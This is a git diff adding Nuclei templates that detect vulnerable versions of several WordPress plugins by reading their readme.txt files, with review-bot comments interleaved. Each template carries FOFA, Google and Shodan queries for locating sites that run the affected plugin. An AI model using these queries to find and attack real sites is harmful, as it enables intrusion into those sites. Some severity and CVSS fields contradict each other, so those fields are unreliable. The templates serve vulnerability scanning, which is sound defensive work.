@@ -0,0 +1,59 @@ +id: CVE-2024-43265 + +info: + name: > + Analytify <= 5.3.1 - Cross-Site Request Forgery to Opt-out + author: topscoder + severity: medium + description: > + The Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.3.1. This is due to missing or incorrect nonce validation on the optout_yes() function. This makes it possible for unauthenticated attackers to opt out of tracking via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/0e407409-989d-48f8-8135-6071015a6064?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43265 + metadata: + fofa-query: "wp-content/plugins/wp-analytify/" + google-query: inurl:"/wp-content/plugins/wp-analytify/" + shodan-query: 'vuln:CVE-2024-43265' + tags: cve,wordpress,wp-plugin,wp-analytify,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-analytify/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-analytify" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.3.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43266.yaml b/poc/cve/CVE-2024-43266.yaml new file mode 100644 index 0000000000..bb3a5b684c --- /dev/null +++ b/poc/cve/CVE-2024-43266.yaml 
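Review bot: The `cvss-metrics` vector `PR:L/UI:N` contradicts the `description` a few lines above it, which describes an unauthenticated attacker who needs to trick a site administrator into clicking a link — that is `PR:N/UI:R`, the vector the CVE-2024-43269 CSRF hunk in this chunk uses for the same attack pattern. One of the two fields is wrong; if the vector was copied from the referenced advisory, correct the description instead, otherwise `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N` keeps the stated 4.3 score while matching the text.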
@@ -0,0 +1,59 @@ +id: CVE-2024-43266 + +info: + name: > + WP Job Portal <= 2.1.6 - Authenticated (Subscriber+) Insecure Direct Object Reference + author: topscoder + severity: low + description: > + The WP Job Portal – A Complete Recruitment System for Company or Job Board website plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 2.1.6 due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/630e4595-4be3-4886-8771-f781bcee674d?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43266 + metadata: + fofa-query: "wp-content/plugins/wp-job-portal/" + google-query: inurl:"/wp-content/plugins/wp-job-portal/" + shodan-query: 'vuln:CVE-2024-43266' + tags: cve,wordpress,wp-plugin,wp-job-portal,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-job-portal/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-job-portal" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43267.yaml b/poc/cve/CVE-2024-43267.yaml new file mode 100644 index 0000000000..0a98580cde --- /dev/null +++ b/poc/cve/CVE-2024-43267.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43267 + +info: + name: > + Mega Addons For Elementor <= 1.9 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Mega Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.9 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/a64c67de-1c16-4dcb-a3e4-81341b37c3e3?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43267 + metadata: + fofa-query: "wp-content/plugins/ultimate-addons-for-elementor/" + google-query: inurl:"/wp-content/plugins/ultimate-addons-for-elementor/" + shodan-query: 'vuln:CVE-2024-43267' + tags: cve,wordpress,wp-plugin,ultimate-addons-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/ultimate-addons-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "ultimate-addons-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.9') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43268.yaml b/poc/cve/CVE-2024-43268.yaml new file mode 100644 index 0000000000..be0d582a30 --- /dev/null +++ b/poc/cve/CVE-2024-43268.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43268 + +info: + name: > + Backup and Restore WordPress <= 1.50 - Missing Authorization + author: topscoder + severity: low + description: > + The Backup and Restore WordPress – Backup Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.50. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/61a050bd-deaa-4115-baa5-f63790816450?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43268 + metadata: + fofa-query: "wp-content/plugins/wp-backitup/" + google-query: inurl:"/wp-content/plugins/wp-backitup/" + shodan-query: 'vuln:CVE-2024-43268' + tags: cve,wordpress,wp-plugin,wp-backitup,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-backitup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.50') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43269.yaml b/poc/cve/CVE-2024-43269.yaml new file mode 100644 index 0000000000..b87002af16 --- /dev/null +++ b/poc/cve/CVE-2024-43269.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43269 + +info: + name: > + Backup and Restore WordPress <= 1.50 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The Backup and Restore WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 1.50. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/fa15939c-44eb-45e5-95d7-49307912f21c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43269 + metadata: + fofa-query: "wp-content/plugins/wp-backitup/" + google-query: inurl:"/wp-content/plugins/wp-backitup/" + shodan-query: 'vuln:CVE-2024-43269' + tags: cve,wordpress,wp-plugin,wp-backitup,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-backitup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.50') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43270.yaml b/poc/cve/CVE-2024-43270.yaml new file mode 100644 index 0000000000..96c1ccd80e --- /dev/null +++ b/poc/cve/CVE-2024-43270.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43270 + +info: + name: > + Backup and Restore WordPress <= 1.50 - Missing Authorization + author: topscoder + severity: high + description: > + The Backup and Restore WordPress – Backup Plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.50. This makes it possible for unauthenticated attackers to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8f35838f-4a7d-4d25-9e5e-956411e59b62?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43270 + metadata: + fofa-query: "wp-content/plugins/wp-backitup/" + google-query: inurl:"/wp-content/plugins/wp-backitup/" + shodan-query: 'vuln:CVE-2024-43270' + tags: cve,wordpress,wp-plugin,wp-backitup,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-backitup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-backitup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.50') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43271.yaml b/poc/cve/CVE-2024-43271.yaml new file mode 100644 index 0000000000..6545b8690d --- /dev/null +++ b/poc/cve/CVE-2024-43271.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43271 + +info: + name: > + Woo Products Widgets For Elementor <= 2.0.0 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + The Widgets for WooCommerce Products on Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.0.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e8336c89-44ac-4e41-bc81-7dae9599c050?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-43271 + metadata: + fofa-query: "wp-content/plugins/woo-products-widgets-for-elementor/" + google-query: inurl:"/wp-content/plugins/woo-products-widgets-for-elementor/" + shodan-query: 'vuln:CVE-2024-43271' + tags: cve,wordpress,wp-plugin,woo-products-widgets-for-elementor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/woo-products-widgets-for-elementor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "woo-products-widgets-for-elementor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.0.0') \ No newline at end of file 
diff --git a/poc/cve/CVE-2024-43272.yaml b/poc/cve/CVE-2024-43272.yaml new file mode 100644 index 0000000000..4656bf26c5 --- /dev/null +++ b/poc/cve/CVE-2024-43272.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43272 + +info: + name: > + Icegram <= 3.1.24 - Missing Authorization + author: topscoder + severity: high + description: > + The Icegram plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the display_messages() function in versions up to, and including, 3.1.24. This makes it possible for unauthenticated attackers to preview campaigns + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/990d62fd-dc55-446e-b3ff-52c7c121aeb8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43272 + metadata: + fofa-query: "wp-content/plugins/icegram/" + google-query: inurl:"/wp-content/plugins/icegram/" + shodan-query: 'vuln:CVE-2024-43272' + tags: cve,wordpress,wp-plugin,icegram,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/icegram/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "icegram" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.24') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43273.yaml b/poc/cve/CVE-2024-43273.yaml new file mode 100644 index 0000000000..117b554981 --- /dev/null +++ b/poc/cve/CVE-2024-43273.yaml 
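Review bot: The `description` for CVE-2024-43272 stops mid-sentence at `to preview campaigns` with no terminating punctuation and no statement of what the preview exposes, so an operator reading the finding gets less than the referenced Wordfence entry provides; finish the sentence from the reference rather than leaving it truncated. The next hunk (CVE-2024-43273) has a related wording slip: the plugin's full name already ends in `plugin`, so `name` reads `... Subscription plugin <= 1.3.14` and `description` reads `... Subscription plugin plugin for WordPress` — drop the generic word or quote the product name to avoid the doubling.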
@@ -0,0 +1,59 @@ +id: CVE-2024-43273 + +info: + name: > + Icegram Collect – Easy Form, Lead Collection and Subscription plugin <= 1.3.14 - Missing Authorization + author: topscoder + severity: low + description: > + The Icegram Collect – Easy Form, Lead Collection and Subscription plugin plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the disconnect_campaignmonitor() function, along with a few others, in versions up to, and including, 1.3.14. This makes it possible for authenticated attackers, with subscriber-level access and above, to modify plugin settings. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/821e763a-fe84-4471-99d0-515e036122c0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43273 + metadata: + fofa-query: "wp-content/plugins/icegram-rainmaker/" + google-query: inurl:"/wp-content/plugins/icegram-rainmaker/" + shodan-query: 'vuln:CVE-2024-43273' + tags: cve,wordpress,wp-plugin,icegram-rainmaker,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/icegram-rainmaker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "icegram-rainmaker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.3.14') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43276.yaml b/poc/cve/CVE-2024-43276.yaml new file mode 100644 index 0000000000..db257083d4 --- /dev/null +++ b/poc/cve/CVE-2024-43276.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43276 + +info: + name: > + Child Theme Creator <= 1.5.4 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Child Theme Creator by Orbisius plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.5.4 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f25f358b-f9b7-4660-8dda-673023dc1967?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43276 + metadata: + fofa-query: "wp-content/plugins/orbisius-child-theme-creator/" + google-query: inurl:"/wp-content/plugins/orbisius-child-theme-creator/" + shodan-query: 'vuln:CVE-2024-43276' + tags: cve,wordpress,wp-plugin,orbisius-child-theme-creator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/orbisius-child-theme-creator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "orbisius-child-theme-creator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.5.4') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43278.yaml b/poc/cve/CVE-2024-43278.yaml new file mode 100644 index 0000000000..65d623a445 --- /dev/null +++ b/poc/cve/CVE-2024-43278.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43278 + +info: + name: > + Meta Field Block <= 1.2.13 - Authenticated (Contributor+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Meta Field Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 1.2.13 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/faee30bb-ba6e-4d3e-8ca1-79fd676e68f5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N + cvss-score: 6.4 + cve-id: CVE-2024-43278 + metadata: + fofa-query: "wp-content/plugins/display-a-meta-field-as-block/" + google-query: inurl:"/wp-content/plugins/display-a-meta-field-as-block/" + shodan-query: 'vuln:CVE-2024-43278' + tags: cve,wordpress,wp-plugin,display-a-meta-field-as-block,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/display-a-meta-field-as-block/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "display-a-meta-field-as-block" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.13') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43279.yaml b/poc/cve/CVE-2024-43279.yaml new file mode 100644 index 0000000000..2bfbb7b4d4 --- /dev/null +++ b/poc/cve/CVE-2024-43279.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43279 + +info: + name: > + Newsletters <= 4.9.8 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Newsletters plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 4.9.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/64de1220-52f5-46a9-b8ba-cf808d5d2e29?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43279 + metadata: + fofa-query: "wp-content/plugins/newsletters-lite/" + google-query: inurl:"/wp-content/plugins/newsletters-lite/" + shodan-query: 'vuln:CVE-2024-43279' + tags: cve,wordpress,wp-plugin,newsletters-lite,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/newsletters-lite/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "newsletters-lite" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 4.9.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43280.yaml b/poc/cve/CVE-2024-43280.yaml new file mode 100644 index 0000000000..5efc1ae278 --- /dev/null +++ b/poc/cve/CVE-2024-43280.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43280 + +info: + name: > + Salon booking system <= 10.8.1 - Unauthenticated Open Redirect + author: topscoder + severity: medium + description: > + The Salon Booking System plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 10.8.1. This is due to insufficient validation on the redirect url supplied. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/b8e64950-4f01-4391-8c65-2f25ff5bcc06?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-43280 + metadata: + fofa-query: "wp-content/plugins/salon-booking-system/" + google-query: inurl:"/wp-content/plugins/salon-booking-system/" + shodan-query: 'vuln:CVE-2024-43280' + tags: cve,wordpress,wp-plugin,salon-booking-system,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/salon-booking-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "salon-booking-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 10.8.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43281.yaml b/poc/cve/CVE-2024-43281.yaml new file mode 100644 index 0000000000..18bb69cd1e --- /dev/null +++ b/poc/cve/CVE-2024-43281.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43281 + +info: + name: > + Void Elementor Post Grid Addon for Elementor Page builder <= 2.3 - Authenticated (Contributor+) Local File Inclusion + author: topscoder + severity: low + description: > + The Void Elementor Post Grid Addon for Elementor Page builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.3 via the 'display_type' attribute. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/15178478-5208-4869-a9f0-07e8e11ef0d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-43281 + metadata: + fofa-query: "wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/" + google-query: inurl:"/wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/" + shodan-query: 'vuln:CVE-2024-43281' + tags: cve,wordpress,wp-plugin,void-elementor-post-grid-addon-for-elementor-page-builder,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/void-elementor-post-grid-addon-for-elementor-page-builder/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 
"void-elementor-post-grid-addon-for-elementor-page-builder" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43282.yaml b/poc/cve/CVE-2024-43282.yaml new file mode 100644 index 0000000000..d0f98f81a8 --- /dev/null +++ b/poc/cve/CVE-2024-43282.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43282 + +info: + name: > + Tutor LMS <= 2.7.2 - Authenticated (Administrator+) SQL Injection + author: topscoder + severity: low + description: > + The Tutor LMS plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 2.7.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/839b68e6-0462-4f88-ac13-ed4b69887d6b?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.2 + cve-id: CVE-2024-43282 + metadata: + fofa-query: "wp-content/plugins/tutor/" + google-query: inurl:"/wp-content/plugins/tutor/" + shodan-query: 'vuln:CVE-2024-43282' + tags: cve,wordpress,wp-plugin,tutor,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tutor/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tutor" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.7.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43283.yaml b/poc/cve/CVE-2024-43283.yaml new file mode 100644 index 0000000000..a9c326777e --- /dev/null +++ b/poc/cve/CVE-2024-43283.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-43283 + +info: + name: > + Contest Gallery <= 23.1.2 - Unauthenticated Information Exposure + author: topscoder + severity: medium + description: > + The Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 23.1.2. This makes it possible for unauthenticated attackers to extract data like comment user IDs and IP Addresses. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f5e400f8-35b4-4be4-bb00-c59e14ddd57f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-43283 + metadata: + fofa-query: "wp-content/plugins/contest-gallery/" + google-query: inurl:"/wp-content/plugins/contest-gallery/" + shodan-query: 'vuln:CVE-2024-43283' + tags: cve,wordpress,wp-plugin,contest-gallery,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/contest-gallery/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "contest-gallery" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 23.1.2') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43284.yaml b/poc/cve/CVE-2024-43284.yaml new file mode 100644 index 0000000000..41cc057d93 --- /dev/null +++ b/poc/cve/CVE-2024-43284.yaml 
